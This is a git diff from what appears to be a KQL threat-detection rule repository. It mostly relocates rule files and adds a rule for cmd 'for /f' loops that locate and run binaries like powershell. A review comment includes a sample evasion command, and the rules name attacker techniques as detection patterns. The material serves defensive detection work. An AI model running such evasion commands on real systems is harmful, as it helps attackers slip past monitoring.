KQL/rules/windows/process_creation/suspicious_query_of_machineguid.kql 
diff --git a/KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql b/KQL/rules/windows/process_creation/suspicious_rasdial_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_rasdial_activity.kql rename to KQL/rules/windows/process_creation/suspicious_rasdial_activity.kql diff --git a/KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql b/KQL/rules/windows/process_creation/suspicious_rdp_redirect_using_tscon.kql similarity index 100% rename from KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql rename to KQL/rules/windows/process_creation/suspicious_rdp_redirect_using_tscon.kql diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql rename to KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql rename to KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql diff --git a/KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql b/KQL/rules/windows/process_creation/suspicious_recursive_takeown.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_recursive_takeown.kql rename to KQL/rules/windows/process_creation/suspicious_recursive_takeown.kql 
diff --git a/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql b/KQL/rules/windows/process_creation/suspicious_redirection_to_local_admin_share.kql similarity index 100% rename from KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql rename to KQL/rules/windows/process_creation/suspicious_redirection_to_local_admin_share.kql diff --git a/KQL/rules/Impact/suspicious_reg_add_bitlocker.kql b/KQL/rules/windows/process_creation/suspicious_reg_add_bitlocker.kql similarity index 100% rename from KQL/rules/Impact/suspicious_reg_add_bitlocker.kql rename to KQL/rules/windows/process_creation/suspicious_reg_add_bitlocker.kql diff --git a/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql b/KQL/rules/windows/process_creation/suspicious_reg_add_open_command.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_reg_add_open_command.kql rename to KQL/rules/windows/process_creation/suspicious_reg_add_open_command.kql diff --git a/KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql b/KQL/rules/windows/process_creation/suspicious_registry_modification_from_ads_via_regini_exe.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql rename to KQL/rules/windows/process_creation/suspicious_registry_modification_from_ads_via_regini_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql b/KQL/rules/windows/process_creation/suspicious_regsvr32_execution_from_remote_share.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql rename to KQL/rules/windows/process_creation/suspicious_regsvr32_execution_from_remote_share.kql 
diff --git a/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql b/KQL/rules/windows/process_creation/suspicious_remote_child_process_from_outlook.kql similarity index 100% rename from KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql rename to KQL/rules/windows/process_creation/suspicious_remote_child_process_from_outlook.kql diff --git a/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/suspicious_response_file_execution_via_odbcconf_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql rename to KQL/rules/windows/process_creation/suspicious_response_file_execution_via_odbcconf_exe.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql b/KQL/rules/windows/process_creation/suspicious_runas_like_flag_combination.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql rename to KQL/rules/windows/process_creation/suspicious_runas_like_flag_combination.kql diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_activity_invoking_sys_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql rename to KQL/rules/windows/process_creation/suspicious_rundll32_activity_invoking_sys_file.kql diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_execution_with_image_extension.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql rename to KQL/rules/windows/process_creation/suspicious_rundll32_execution_with_image_extension.kql 
diff --git a/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_invoking_inline_vbscript.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql rename to KQL/rules/windows/process_creation/suspicious_rundll32_invoking_inline_vbscript.kql diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_setupapi_dll_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql rename to KQL/rules/windows/process_creation/suspicious_rundll32_setupapi_dll_activity.kql diff --git a/KQL/rules/Execution/suspicious_runscripthelper_exe.kql b/KQL/rules/windows/process_creation/suspicious_runscripthelper_exe.kql similarity index 100% rename from KQL/rules/Execution/suspicious_runscripthelper_exe.kql rename to KQL/rules/windows/process_creation/suspicious_runscripthelper_exe.kql diff --git a/KQL/rules/Execution/suspicious_scan_loop_network.kql b/KQL/rules/windows/process_creation/suspicious_scan_loop_network.kql similarity index 100% rename from KQL/rules/Execution/suspicious_scan_loop_network.kql rename to KQL/rules/windows/process_creation/suspicious_scan_loop_network.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_involving_temp_folder.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql rename to KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_involving_temp_folder.kql 
diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql rename to KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_name_as_guid.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql rename to KQL/rules/windows/process_creation/suspicious_scheduled_task_name_as_guid.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_execution_appdata_folder.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql rename to KQL/rules/windows/process_creation/suspicious_schtasks_execution_appdata_folder.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_type_with_high_privileges.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql rename to KQL/rules/windows/process_creation/suspicious_schtasks_schedule_type_with_high_privileges.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_types.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql rename to KQL/rules/windows/process_creation/suspicious_schtasks_schedule_types.kql 
diff --git a/KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_screensave_change_by_reg_exe.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql rename to KQL/rules/windows/process_creation/suspicious_screensave_change_by_reg_exe.kql diff --git a/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql b/KQL/rules/windows/process_creation/suspicious_script_execution_from_temp_folder.kql similarity index 100% rename from KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql rename to KQL/rules/windows/process_creation/suspicious_script_execution_from_temp_folder.kql diff --git a/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql b/KQL/rules/windows/process_creation/suspicious_serv_u_process_pattern.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql rename to KQL/rules/windows/process_creation/suspicious_serv_u_process_pattern.kql diff --git a/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql b/KQL/rules/windows/process_creation/suspicious_service_binary_directory.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql rename to KQL/rules/windows/process_creation/suspicious_service_binary_directory.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql b/KQL/rules/windows/process_creation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql rename to KQL/rules/windows/process_creation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql 
diff --git a/KQL/rules/Persistence/suspicious_service_path_modification.kql b/KQL/rules/windows/process_creation/suspicious_service_path_modification.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_service_path_modification.kql rename to KQL/rules/windows/process_creation/suspicious_service_path_modification.kql diff --git a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql b/KQL/rules/windows/process_creation/suspicious_shellexec_rundll_call_via_ordinal.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql rename to KQL/rules/windows/process_creation/suspicious_shellexec_rundll_call_via_ordinal.kql diff --git a/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql b/KQL/rules/windows/process_creation/suspicious_shells_spawn_by_java_utility_keytool.kql similarity index 100% rename from KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql rename to KQL/rules/windows/process_creation/suspicious_shells_spawn_by_java_utility_keytool.kql diff --git a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql b/KQL/rules/windows/process_creation/suspicious_speech_runtime_binary_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_speech_runtime_binary_child_process.kql diff --git a/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql b/KQL/rules/windows/process_creation/suspicious_splwow64_without_params.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql rename to KQL/rules/windows/process_creation/suspicious_splwow64_without_params.kql 
diff --git a/KQL/rules/Execution/suspicious_spool_service_child_process.kql b/KQL/rules/windows/process_creation/suspicious_spool_service_child_process.kql similarity index 100% rename from KQL/rules/Execution/suspicious_spool_service_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_spool_service_child_process.kql diff --git a/KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql b/KQL/rules/windows/process_creation/suspicious_sysaidserver_child.kql similarity index 100% rename from KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql rename to KQL/rules/windows/process_creation/suspicious_sysaidserver_child.kql diff --git a/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_system_user_process_creation.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_system_user_process_creation.kql rename to KQL/rules/windows/process_creation/suspicious_system_user_process_creation.kql diff --git a/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql b/KQL/rules/windows/process_creation/suspicious_sysvol_domain_group_policy_access.kql similarity index 100% rename from KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql rename to KQL/rules/windows/process_creation/suspicious_sysvol_domain_group_policy_access.kql diff --git a/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql b/KQL/rules/windows/process_creation/suspicious_tscon_start_as_system.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql rename to KQL/rules/windows/process_creation/suspicious_tscon_start_as_system.kql 
diff --git a/KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql b/KQL/rules/windows/process_creation/suspicious_ultravnc_execution.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql
rename to KQL/rules/windows/process_creation/suspicious_ultravnc_execution.kql
diff --git a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql b/KQL/rules/windows/process_creation/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
rename to KQL/rules/windows/process_creation/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
diff --git a/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
similarity index 100%
rename from KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
rename to KQL/rules/windows/process_creation/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
diff --git a/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql
new file mode 100644
index 00000000..29fd1b73
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_usage_of_for_loop_with_recursive_directory_search_in_cmd.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Usage of For Loop with Recursive Directory Search in CMD
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2025-11-12
+// Level: medium
+// Description: Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.
+// This pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.
+// This behavior has been observed in various malicious lnk files.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1027.010
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "for /f" and ProcessCommandLine contains "tokens=" and ProcessCommandLine contains "in (" and ProcessCommandLine contains "dir") or (InitiatingProcessCommandLine contains "for /f" and InitiatingProcessCommandLine contains "tokens=" and InitiatingProcessCommandLine contains "in (" and InitiatingProcessCommandLine contains "dir")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql b/KQL/rules/windows/process_creation/suspicious_usage_of_shellexec_rundll.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql
rename to KQL/rules/windows/process_creation/suspicious_usage_of_shellexec_rundll.kql
diff --git a/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql b/KQL/rules/windows/process_creation/suspicious_use_of_csharp_interactive_console.kql
similarity index 100%
rename from KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql
rename to KQL/rules/windows/process_creation/suspicious_use_of_csharp_interactive_console.kql
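Review bot: The `| where` line's `contains "dir"` predicate is far looser than the title and description promise: KQL `contains` is a case-insensitive substring match, so any `for /f "tokens=..." ... in (...)` command whose command line has `dir` anywhere in it (`directory`, `redirect`, a path component) satisfies it, and nothing in the query requires the `/s` switch that actually makes the listing recursive. Ordinary admin batch scripts use `for /f "tokens=*" %i in ('dir /b ...')` routinely, so as written this medium-level rule will fire on benign automation as readily as on the LNK pattern the description names. I would anchor both branches on the command substitution and the recursive flag, e.g. `ProcessCommandLine contains "('dir" and ProcessCommandLine contains "/s"` (or a single `ProcessCommandLine matches regex @"(?i)in\s*\(\s*'dir\s[^)]*/s"` to tolerate spacing), and add `| where FileName =~ "cmd.exe" or InitiatingProcessFileName =~ "cmd.exe"` since `for /f` is cmd syntax. It would also help tuners to record the tested command shape in the header, e.g. `// Example: cmd /c for /f "tokens=*" %i in ('dir /s /b C:\Windows\*powershell.exe') do %i`, so the anchor chosen is documented alongside the rule.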
diff --git a/KQL/rules/Discovery/suspicious_use_of_psloglist.kql b/KQL/rules/windows/process_creation/suspicious_use_of_psloglist.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_use_of_psloglist.kql rename to KQL/rules/windows/process_creation/suspicious_use_of_psloglist.kql diff --git a/KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql b/KQL/rules/windows/process_creation/suspicious_userinit_child_process.kql similarity index 100% rename from KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_userinit_child_process.kql diff --git a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql b/KQL/rules/windows/process_creation/suspicious_vboxdrvinst_exe_parameters.kql similarity index 100% rename from KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql rename to KQL/rules/windows/process_creation/suspicious_vboxdrvinst_exe_parameters.kql diff --git a/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql b/KQL/rules/windows/process_creation/suspicious_velociraptor_child_process.kql similarity index 100% rename from KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_velociraptor_child_process.kql diff --git a/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql b/KQL/rules/windows/process_creation/suspicious_vsls_agent_command_with_agentextensionpath_load.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql rename to KQL/rules/windows/process_creation/suspicious_vsls_agent_command_with_agentextensionpath_load.kql 
diff --git a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/suspicious_webdav_client_execution_via_rundll32_exe.kql similarity index 100% rename from KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql rename to KQL/rules/windows/process_creation/suspicious_webdav_client_execution_via_rundll32_exe.kql diff --git a/KQL/rules/Discovery/suspicious_where_execution.kql b/KQL/rules/windows/process_creation/suspicious_where_execution.kql similarity index 100% rename from KQL/rules/Discovery/suspicious_where_execution.kql rename to KQL/rules/windows/process_creation/suspicious_where_execution.kql diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql rename to KQL/rules/windows/process_creation/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql rename to KQL/rules/windows/process_creation/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql b/KQL/rules/windows/process_creation/suspicious_windows_service_tampering.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql rename to KQL/rules/windows/process_creation/suspicious_windows_service_tampering.kql 
diff --git a/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql rename to KQL/rules/windows/process_creation/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql diff --git a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql b/KQL/rules/windows/process_creation/suspicious_windows_update_agent_empty_cmdline.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql rename to KQL/rules/windows/process_creation/suspicious_windows_update_agent_empty_cmdline.kql diff --git a/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql b/KQL/rules/windows/process_creation/suspicious_windowsterminal_child_processes.kql similarity index 100% rename from KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql rename to KQL/rules/windows/process_creation/suspicious_windowsterminal_child_processes.kql diff --git a/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql b/KQL/rules/windows/process_creation/suspicious_wmic_execution_via_office_process.kql similarity index 100% rename from KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql rename to KQL/rules/windows/process_creation/suspicious_wmic_execution_via_office_process.kql diff --git a/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql b/KQL/rules/windows/process_creation/suspicious_wmiprvse_child_process.kql similarity index 100% rename from KQL/rules/Execution/suspicious_wmiprvse_child_process.kql rename to KQL/rules/windows/process_creation/suspicious_wmiprvse_child_process.kql 
diff --git a/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql b/KQL/rules/windows/process_creation/suspicious_workstation_locking_via_rundll32.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql rename to KQL/rules/windows/process_creation/suspicious_workstation_locking_via_rundll32.kql diff --git a/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql b/KQL/rules/windows/process_creation/suspicious_x509enrollment_process_creation.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql rename to KQL/rules/windows/process_creation/suspicious_x509enrollment_process_creation.kql diff --git a/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql b/KQL/rules/windows/process_creation/suspicious_xor_encoded_powershell_command.kql similarity index 100% rename from KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql rename to KQL/rules/windows/process_creation/suspicious_xor_encoded_powershell_command.kql diff --git a/KQL/rules/Execution/suspicious_zipexec_execution.kql b/KQL/rules/windows/process_creation/suspicious_zipexec_execution.kql similarity index 100% rename from KQL/rules/Execution/suspicious_zipexec_execution.kql rename to KQL/rules/windows/process_creation/suspicious_zipexec_execution.kql diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql b/KQL/rules/windows/process_creation/syncappvpublishingserver_execute_arbitrary_powershell_code.kql similarity index 100% rename from KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql rename to KQL/rules/windows/process_creation/syncappvpublishingserver_execute_arbitrary_powershell_code.kql 
diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql b/KQL/rules/windows/process_creation/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql similarity index 100% rename from KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql rename to KQL/rules/windows/process_creation/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql diff --git a/KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql b/KQL/rules/windows/process_creation/sysinternals_psservice_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql rename to KQL/rules/windows/process_creation/sysinternals_psservice_execution.kql diff --git a/KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql b/KQL/rules/windows/process_creation/sysinternals_pssuspend_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql rename to KQL/rules/windows/process_creation/sysinternals_pssuspend_execution.kql diff --git a/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql b/KQL/rules/windows/process_creation/sysinternals_pssuspend_suspicious_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql rename to KQL/rules/windows/process_creation/sysinternals_pssuspend_suspicious_execution.kql diff --git a/KQL/rules/Defense Evasion/sysmon_configuration_update.kql b/KQL/rules/windows/process_creation/sysmon_configuration_update.kql similarity index 100% rename from KQL/rules/Defense Evasion/sysmon_configuration_update.kql rename to KQL/rules/windows/process_creation/sysmon_configuration_update.kql 
diff --git a/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql b/KQL/rules/windows/process_creation/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql
rename to KQL/rules/windows/process_creation/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql
diff --git a/KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/windows/process_creation/sysmon_driver_unloaded_via_fltmc_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/sysmon_driver_unloaded_via_fltmc_exe.kql
rename to KQL/rules/windows/process_creation/sysmon_driver_unloaded_via_fltmc_exe.kql
diff --git a/KQL/rules/Execution/sysprep_on_appdata_folder.kql b/KQL/rules/windows/process_creation/sysprep_on_appdata_folder.kql
similarity index 100%
rename from KQL/rules/Execution/sysprep_on_appdata_folder.kql
rename to KQL/rules/windows/process_creation/sysprep_on_appdata_folder.kql
diff --git a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/system_disk_and_volume_reconnaissance_via_wmic_exe.kql
diff --git a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql b/KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql
similarity index 57%
rename from KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql
rename to KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql
index ed35a173..3f7329a8 100644
--- a/KQL/rules/Defense Evasion/system_file_execution_location_anomaly.kql
+++ b/KQL/rules/windows/process_creation/system_file_execution_location_anomaly.kql 
@@ -7,4 +7,4 @@
 // Tags: attack.defense-evasion, attack.t1036
 DeviceProcessEvents
-| where (FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winver.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wsmprovhost.exe") and (not(((FolderPath startswith "C:\\$WINDOWS.~BT\\" or FolderPath startswith "C:\\$WinREAgent\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\uus\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or ((FolderPath contains "C:\\Program Files\\PowerShell\\7\\" or FolderPath contains "C:\\Program Files\\PowerShell\\7-preview\\" or 